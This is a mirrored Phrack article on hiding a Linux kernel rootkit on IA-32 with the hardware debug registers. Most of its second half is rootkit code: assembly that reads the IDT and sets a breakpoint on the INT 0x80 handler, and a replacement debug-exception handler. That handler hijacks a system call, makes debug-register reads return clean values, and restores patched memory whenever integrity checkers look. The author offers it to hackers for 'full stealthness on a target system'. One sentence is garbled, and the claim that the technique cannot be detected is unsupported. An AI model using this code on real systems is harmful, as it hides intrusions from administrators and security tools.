mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
411 lines
18 KiB
Text
411 lines
18 KiB
Text
![]() |
==Phrack Inc.==
|
||
|
|
||
|
Volume 0x0c, Issue 0x41, Phile #0x08 of 0x0f
|
||
|
|
||
|
|
||
|
|=---------------------=[ Mistifying the debugger, ]=--------------------=|
|
||
|
|=---------------------=[ ultimate stealthness ]=--------------------=|
|
||
|
|=-----------------------------------------------------------------------=|
|
||
|
|=------------------------=[ halfdead@phear.org ]=-----------------------=|
|
||
|
|
||
|
|
||
|
--[ Introduction
|
||
|
|
||
|
Over the years, there have been a plethora of techniques and methods of
|
||
|
hiding one's presence in a hacked system. Many of them were focused on
|
||
|
directly tampering the system call table, others were modifying the
|
||
|
interrupt handler, while others were operating at the VFS layer. But all
|
||
|
of them were modifying the underlying operating system in a very visible
|
||
|
manner, making them easily detected.
|
||
|
|
||
|
In the article I will present a technique that is able to achieve ultimate
|
||
|
stealthness in kernel rootkits, by using a common x86 feature, the
|
||
|
debugging mechanism. Although it works on any IA-32 compatible platform,
|
||
|
the following technique will be detailed for Linux operating system and I
|
||
|
will show you how one can intercept the normal flow of execution without
|
||
|
touching the "classical" hooking targets. In fact, this technique can be
|
||
|
so good that no one will ever notice our presence.
|
||
|
|
||
|
When we refer to "debugger" in this article, we actually mean the IA-32
|
||
|
debugging mechanism, which is only accessible from ring zero. Userland
|
||
|
debuggers don't make use of this mechanism, only some kernel debuggers
|
||
|
do.
|
||
|
|
||
|
|
||
|
--[ The debugger
|
||
|
|
||
|
"The IA-32 architecture provides extensive debugging
|
||
|
facilities for use in debugging code and monitoring
|
||
|
code execution and processor performance. These
|
||
|
facilities are valuable for debugging applications
|
||
|
software, system software, and multitasking operating
|
||
|
systems."
|
||
|
|
||
|
In order to make life easier for developers, Intel introduced a mechanism
|
||
|
that was intented to manage the debugging process. This mechanism is
|
||
|
handled by a set of special registers (called 'debugging registers,
|
||
|
DR0..DR7) which allow the user to set hardware breakpoints on memory
|
||
|
addresses. As soon as the execution flow hits an address marked with a
|
||
|
breakpoint, it hands the control to the debug interrupt handler (INT 1),
|
||
|
which calls the do_debug() function (defined in ../i386/kernel/traps.c) to
|
||
|
take care of the actual situation that raised the exception.
|
||
|
|
||
|
The debugging support is accessed through the debug registers (DB0 through
|
||
|
DB7) and two model-specific registers (MSRs). For the purpose of this paper
|
||
|
we will only focus on the debug registers. These registers hold the
|
||
|
addresses of memory and I/O locations, called breakpoints. Breakpoints are
|
||
|
user-selected locations in a program, a data-storage area in memory, or
|
||
|
specific I/O ports where a programmer or system designer wishes to halt
|
||
|
execution of a program and examine the state of the processor by invoking
|
||
|
debugger software.
|
||
|
|
||
|
A debug exception (#DB) is generated when a memory or I/O access is made
|
||
|
to one of these breakpoint addresses. A breakpoint is specified for a
|
||
|
particular form of memory or I/O access, such as a memory read and/or
|
||
|
write operation or an I/O read and/or write operation. The debug registers
|
||
|
support both instruction breakpoints and data breakpoint. The MSRs (which
|
||
|
were introduced into the IA-32 architecture in the P6 family processors)
|
||
|
monitor branches, interrupts, and exceptions and record the addresses of
|
||
|
the last branch, interrupt or exception taken and the last branch taken
|
||
|
before an interrupt or exception.
|
||
|
|
||
|
|
||
|
--[ The debug registers
|
||
|
|
||
|
There are 8 debug registers supported by the Intel processors, which
|
||
|
control the debug operation of the processor. These registers can be
|
||
|
written to and read using the move to or from debug register form of
|
||
|
the MOV instruction. A debug register may be the source or destination
|
||
|
operand for one of these instructions. The debug registers are privileged
|
||
|
resources; a MOV instruction that accesses these registers can only be
|
||
|
executed in real-address mode, in SMM, or in protected mode at a CPL
|
||
|
of 0. An attempt to read or write the debug registers from any other
|
||
|
privilege level generates a general protection exception.
|
||
|
|
||
|
The primary function of the debug registers is to set up and monitor
|
||
|
from 1 to 4 breakpoints, numbered 0 though 3. The debug mechanism allows
|
||
|
us to manage the breakpoints through two special registers, DR6 and DR7,
|
||
|
which I will describe in detail later on. For each breakpoint, the
|
||
|
following information can be specified and/or detected with the debug
|
||
|
registers:
|
||
|
|
||
|
- The linear address where the breakpoint is to occur.
|
||
|
- The length of the breakpoint location (1, 2, or 4 bytes).
|
||
|
- The operation that must be performed at the address for a debug
|
||
|
exception to be generated.
|
||
|
- Whether the breakpoint is enabled.
|
||
|
- Whether the breakpoint condition was present when the debug
|
||
|
exception was generated.
|
||
|
|
||
|
-------[ Debug address registers
|
||
|
|
||
|
Each of the debug-address registers (DR0-DR3) holds the 32-bit linear
|
||
|
address of a breakpoint. Breakpoint comparisons are made before physical
|
||
|
address translation occurs.
|
||
|
|
||
|
|
||
|
-------[ Debug registers DR4 and DR5
|
||
|
|
||
|
Debug registers DR4 and DR5 are reserved when debug extensions are enabled
|
||
|
(the DE flag in control register CR4 is set), and attempts to reference
|
||
|
these registers will raise an invalid-opcode exception. When the DE flag
|
||
|
is not set, these registers are aliased to DR6 and DR7.
|
||
|
|
||
|
|
||
|
------[ Debug status register (DR6)
|
||
|
|
||
|
This special register is used to report the debug conditions that existed
|
||
|
at the time the last debug exception occured. The flags in this register
|
||
|
show the following information:
|
||
|
|
||
|
- B0..B3 (bits 0..3) indicate that a breakpoint condition was
|
||
|
detected. These flags are set if the condition described
|
||
|
for each breakpoint by the LENn, and R/Wn flags in debug
|
||
|
control register DR7 is true. They are set even if the
|
||
|
breakpoint is not enabled by the Ln and Gn flags in register
|
||
|
DR7.
|
||
|
|
||
|
- BD (bit 13) (debug register access detected) indicates that the
|
||
|
next instruction in the instruction stream will access one of the
|
||
|
debug registers (DR0..DR7). This flag is enabled when the general
|
||
|
detect (GD) flag in debug control register DR7 is set.
|
||
|
|
||
|
- BS (bit 14) (single step) indicates (when set) that the debug
|
||
|
exception was triggered by the single-step execution mode.
|
||
|
|
||
|
- BT (bit 15) (task switch) indicates (when set) that the debug
|
||
|
exception resulted from a task switch where the debug trap flag
|
||
|
in the TSS of the target task was set.
|
||
|
|
||
|
The processor never clears the contents of DR6 register.
|
||
|
|
||
|
|
||
|
------[ Debug control register (DR7)
|
||
|
|
||
|
The debug control register (DR7) enables or disables breakpoints and sets
|
||
|
breakpoint conditions. Its flags and fields control the following things:
|
||
|
|
||
|
- L0..L3 (bits 0, 2, 4, 6) (local breakpoint enable) enable (when
|
||
|
set) the breakpoint condition for the associated breakpoint for
|
||
|
the current task. When a breakpoint condition is detected and its
|
||
|
associated Ln flag is set, a debug exception is generated. The
|
||
|
processor automatically clears these flags on every task switch
|
||
|
to avoid unwanted breakpoint conditions in the new task.
|
||
|
|
||
|
- G0..G3 (bits 1, 3, 5, 7) (global breakpoint enable) enable (when
|
||
|
set) the breakpoint condition for the associated breakpoint for
|
||
|
all tasks. When a breakpoint condition is detected and its
|
||
|
associated Gn flag is set, a debug exception is generated.
|
||
|
The processor does not clear these flags on a task switch,
|
||
|
allowing a breakpoint to be enabled for all tasks.
|
||
|
|
||
|
- LE and GE (bits 8 and 9) (local and global exact breakpoint
|
||
|
enable) cause the processor to detect the exact instruction that
|
||
|
caused a data breakpoint condition. Not supported in P6 family
|
||
|
processors.
|
||
|
|
||
|
- GD (bit 13) (general detect enable) enables (when set)
|
||
|
debug-register protection, which causes a debug exception to be
|
||
|
generated prior to any MOV instruction that accesses a debug register.
|
||
|
When such a condition is detected, the BD flag in debug status register
|
||
|
DR6 is set prior to generating the exception.
|
||
|
|
||
|
- R/W0..R/W3 (bits 16, 17, 20, 21, 24, 25, 28, and 29) (read/write)
|
||
|
specifies the breakpoint condition for the corresponding breakpoint.
|
||
|
For more information read the Intel manual.
|
||
|
|
||
|
- LEN0..LEN3 (bits 18, 19, 22, 23, 26, 27, 30, and 31) (length)
|
||
|
|
||
|
|
||
|
--[ The magic
|
||
|
|
||
|
Ok, so we've learnt almost everything now about the IA-32 debugging
|
||
|
mechanism. Where is the goodies you've promised?? Now we know a few
|
||
|
important things: we can set a breakpoint on a memory address and as soon
|
||
|
as execution flow hits our breakpoint, the execution is redirected to the
|
||
|
debug handler (INT 1). Uhmm, so what if we replace the existing debug
|
||
|
handler or one of the underlying functions with our own? As we can see
|
||
|
from entry.S,
|
||
|
|
||
|
ENTRY(debug)
|
||
|
pushl $0
|
||
|
pushl $ SYMBOL_NAME(do_debug)
|
||
|
jmp error_code
|
||
|
|
||
|
the actual debug handler is a C function, do_debug() defined in traps.c.
|
||
|
Yes, ok, I think we are able to patch the INT 1 handler and then call
|
||
|
do_debug() on our own OR we could come up with our own do_debug() and
|
||
|
expect to be called by the debug handler, so we rest assured that the
|
||
|
IDT remains untouched. But what should our handler handle? Most obviously,
|
||
|
we need to check a few parameters and then pass control to the actual
|
||
|
operating system do_debug(). But what parameters should we monitor? Keep
|
||
|
reading...
|
||
|
|
||
|
|
||
|
------[ Hijacking the sys_call_table[]
|
||
|
|
||
|
Now you should have an idea how to hijack the syscall table making use
|
||
|
onunnt on read/write/execution on targetted address in memory. This can
|
||
|
be either INT 80 handler address or syscall table address, it matters
|
||
|
less as the effect is the same, in the end. Therefore, each time the
|
||
|
operating system is going for a syscall, it will wind up in our handler.
|
||
|
We have two options here: A) hijacking the INT 80 handler directly in
|
||
|
IDT or B) hijacking the actual address of sys_call_table[] in memory. Any
|
||
|
of them is fit for our purposes, so we will aim for A. The following
|
||
|
function will return the address of INT 80 handler.
|
||
|
|
||
|
get_idt_entry:
|
||
|
sidt idtr
|
||
|
movl idtr+2, %ebx
|
||
|
leal (%ebx, %eax, 8), %ebx
|
||
|
movw (%ebx), %cx
|
||
|
roll $16, %ecx
|
||
|
movw 0x6(%ebx), %cx
|
||
|
roll $16, %ecx
|
||
|
movl %ecx, %eax
|
||
|
ret
|
||
|
|
||
|
Once we know the address, we can set up a breakpoint as follows:
|
||
|
|
||
|
set_bpm:
|
||
|
movl $0x80, %eax
|
||
|
call get_idt_entry
|
||
|
movl %eax, %dr0
|
||
|
xorl %eax, %eax
|
||
|
orl $0x2080, %eax
|
||
|
movl %eax, %dr7
|
||
|
ret
|
||
|
|
||
|
As you can see, the set_bpm() function will load DR0 with memory address
|
||
|
where INT 80 is located and, also, will set up the according flags in DR7,
|
||
|
including the magic GD bit, which allows us to monitor WHO and WHY is
|
||
|
accessing the debug registers. This bit is very important for us because
|
||
|
it "causes a debug exception to be generated prior to any MOV instruction
|
||
|
that accesses a debug register". Wow, do you mean...? Yeah, if SOMEONE is
|
||
|
trying to read/write the debug registers, the control is passed to our
|
||
|
handler BEFORE the instruction takes place. So, we know if someone, a
|
||
|
debugger or some tool of the devil, is checking the debug registers, even
|
||
|
before they know it. This gives us time to cover our tracks: we can undo
|
||
|
everything and wait some time for danger to pass, we can simply skip the
|
||
|
instructions affecting the debug registers, etc. The best thing to do is
|
||
|
to show the system clean debug registers and after a short period of time,
|
||
|
hook everything back to best suit our needs. The best aproach is to come
|
||
|
up with a code emulator, analyzing the type of the instruction accessing
|
||
|
debug registers, and based on that decide what action will follow: clean
|
||
|
the debug registers and restore later or simply increase the instruction
|
||
|
count so that the instruction is simply ignored. Anyway, this leaves an
|
||
|
open discussion.
|
||
|
|
||
|
|
||
|
------[ The handler
|
||
|
|
||
|
Now, we managed to redirect the flow of execution without patching anything
|
||
|
in the syscall table or INT 80 handler. But still, what should our handler
|
||
|
handle? For starter, in its most simplistic form, our handler needs to
|
||
|
check the value of the %eax register, because at this point, it contains
|
||
|
the desired syscall number, and based on that it should feed the OS with
|
||
|
our hacked syscall. This is how a very simple handler should look like:
|
||
|
|
||
|
asmlinkage void new_do_debug(struct pt_regs * regs, long error_code)
|
||
|
{
|
||
|
|
||
|
unsigned long condition;
|
||
|
unsigned long mask = 0x2008;
|
||
|
|
||
|
|
||
|
__asm__ __volatile__("movl %%db6,%0" : "=r" (condition));
|
||
|
|
||
|
if (condition & BD_FLAG) { /* someone is r/w the registers */
|
||
|
condition &= ~BD_FLAG;
|
||
|
__asm__ __volatile__ ("movl %0, %%db6" : : "r" (condition));
|
||
|
regs->eip += 3;
|
||
|
__asm__ __volatile__ ("movl %0, %%db7" : : "r" (mask));
|
||
|
}
|
||
|
|
||
|
if (condition & DR_TRAP0) {
|
||
|
if (regs->eax == __NR_time)
|
||
|
sys_call_table[__NR_time] = hacked_time;
|
||
|
|
||
|
if (regs->eflags & VM_MASK) {
|
||
|
(*old_do_debug)(regs,error_code);
|
||
|
__asm__ __volatile__ ("movl %0, %%db7" : : "r" (mask));
|
||
|
}
|
||
|
|
||
|
condition &= ~DR_TRAP0;
|
||
|
__asm__ __volatile__ ("movl %0, %%db6" : : "r" (condition));
|
||
|
__asm__ __volatile__ ("movl %0, %%db7" : : "r" (mask));
|
||
|
regs->eflags |= X86_EFLAGS_RF;
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
(*old_do_debug)(regs, error_code);
|
||
|
__asm__ __volatile__ ("movl %0, %%db7" : : "r" (mask));
|
||
|
}
|
||
|
|
||
|
return;
|
||
|
}
|
||
|
|
||
|
What are we doing here? First, we grab the values in the status register
|
||
|
(DR6) and try to figure out what triggered our handler. If our execution
|
||
|
comes as a result of the breakpoint we've placed, we compare the value in
|
||
|
%eax register to the value of the syscall we decided to hijack, which was
|
||
|
sys_time() in our case. In the example provided, due to the lack of space
|
||
|
and time, we did a direct change of the sys_call_table[] but this is not
|
||
|
something to worry about as, the hacked_time() is modifying the
|
||
|
sys_call_table[] back to original in the instant it gets executed:
|
||
|
|
||
|
|
||
|
asmlinkage long hacked_time(int *tloc)
|
||
|
{
|
||
|
sys_call_table[__NR_time] = original_time;
|
||
|
printk("<1>WE changed it!!\n");
|
||
|
return original_time(tloc);
|
||
|
}
|
||
|
|
||
|
Ofcourse, there are other ways of doing it without touching the syscall
|
||
|
table at all but take into consideration that the first thing the
|
||
|
hacked_time() does is changing back the value in sys_call_table[], meaning
|
||
|
that the actual change takes place for less than a microsecond so it
|
||
|
shouldn't be a problem.
|
||
|
|
||
|
A better method would be to analyze the parameters of the syscall, based on
|
||
|
the syscall number, which at the time our handler takes place is the value
|
||
|
in %eax register. We could feed the hacked parameters by simply filling the
|
||
|
according registers. This method would create a "virtual" syscall table,
|
||
|
so we don't need to touch the actual syscall table at all.
|
||
|
|
||
|
So now we learnt how to set a breakpoint on a memory address, how to enable
|
||
|
that breakpoint; we also learnt that we can hijack the normal execution
|
||
|
flow without tampering the INT 80 handler nor the syscall table handler
|
||
|
nor the syscall table itself. Yes, you can say it's a lovely technique, a
|
||
|
bit of magic. But still, we modify the INT 1 handler, or at least, we patch
|
||
|
the do_debug() function, so we're not that stealth. Just keep reading...
|
||
|
|
||
|
|
||
|
|
||
|
---[ Blindfold
|
||
|
|
||
|
We learnt so many beautiful things by now, we take control of the system
|
||
|
and no one detects a direct tampering of the kernel. We covered our tracks
|
||
|
thanks to the GD/BD bits so, if someone is looking at the debugging
|
||
|
registers we simply ignore their curiosity (regs->eip +=3). But what if
|
||
|
someone wants to check all the IDT for integrity? Or what if a debugger
|
||
|
or a similar tool needs to place its own handler on INT 1? Are we lost
|
||
|
then?
|
||
|
It sure looks like it..
|
||
|
|
||
|
But wait.. DR6 and DR7 come to rescue once more. What we need to do is the
|
||
|
following:
|
||
|
|
||
|
- set up your handler on INT 1
|
||
|
- set up the breakpoint to watch for INT 80 address
|
||
|
- set a secondary breakpoint to watch on our handler's address
|
||
|
|
||
|
Oh, wait! It can't be that simple. Yes, it is! Like this, we practically
|
||
|
don't affect the kernel at all, for the unwanted eye. In our ideal handler,
|
||
|
the code emulator checks the type of the instruction that attempts to
|
||
|
access debug registers, wether is the breakpoint we put on INT 80 or
|
||
|
INT 1 and act accordingly. We already explained what it should do for
|
||
|
hijacking INT 80, let's talk now about INT 1. By placing a secondary
|
||
|
breakpoint on INT 1 or do_debug() function, we make sure that we know
|
||
|
apriori when someone attempts to read the only location in the kernel
|
||
|
memory we modified. The best thing to do is to make that single address
|
||
|
back to original. Like this, when some devilish tool attempts to check for
|
||
|
our presence in the IDT too (i don't think there any tools doing that
|
||
|
outhere, but that's simply because a whitehat would've never thought it's
|
||
|
necessary), we let them see the untouched value. This is "deep cover" mode.
|
||
|
But did we lose the control over the kernel now? Well, not really, we're
|
||
|
still in control: we can "reinstall" our rootkit after a few nanoseconds,
|
||
|
so they miss us every time they look at us. It's like blindfolding them.
|
||
|
This technique is also helpful when dealing with a debugger
|
||
|
(or similar tool) trying to place its own hook in INT 1 handler. Think
|
||
|
about it: we detect the attempt and make everything back to normal, they
|
||
|
place their hook, we hijack their hook as a normal INT 1 hijack and as
|
||
|
soon as they check for their presence, for example, by checking the
|
||
|
presence of the handler, we let them see themselves. It's like chaining
|
||
|
hooks, or so. When I discovered that I was stunned. When I realised it
|
||
|
really works I was amazed. This is the ultimate stealthness, the holygrail
|
||
|
of hackers!
|
||
|
|
||
|
|
||
|
---[ Closing words
|
||
|
|
||
|
This technique has been actively used in the underground for more than 8
|
||
|
years now. The beauty about it: it is, in fact, a basic IA-32 feature. They
|
||
|
cannot defeat against it without removing the whole debug mechanism. I
|
||
|
decided to make it public in phrack through a "scientific" paper *g* but it
|
||
|
wasn't my choice: the technique leaked a while ago. I highly doubt that the
|
||
|
person that leaked it knows exactly what his tool is actually capable of
|
||
|
and what is actually doing, so I decided to help him and any other hacker
|
||
|
in the world willing to learn and improve their skills. As you have seen,
|
||
|
this is one very powerful technique, allowing one to achieve full
|
||
|
stealthness on a target system. Being a fundamental processor feature,
|
||
|
means it can be used on ANY operating system running on IA-32 and also,
|
||
|
there is no way of detecting or protecting against it, even if it is not
|
||
|
0day anymore ;(
|
||
|
|
||
|
|
||
|
---[ Kudos
|
||
|
|
||
|
halvar, twiz, reverser, sd and the rest of the digitalnerds
|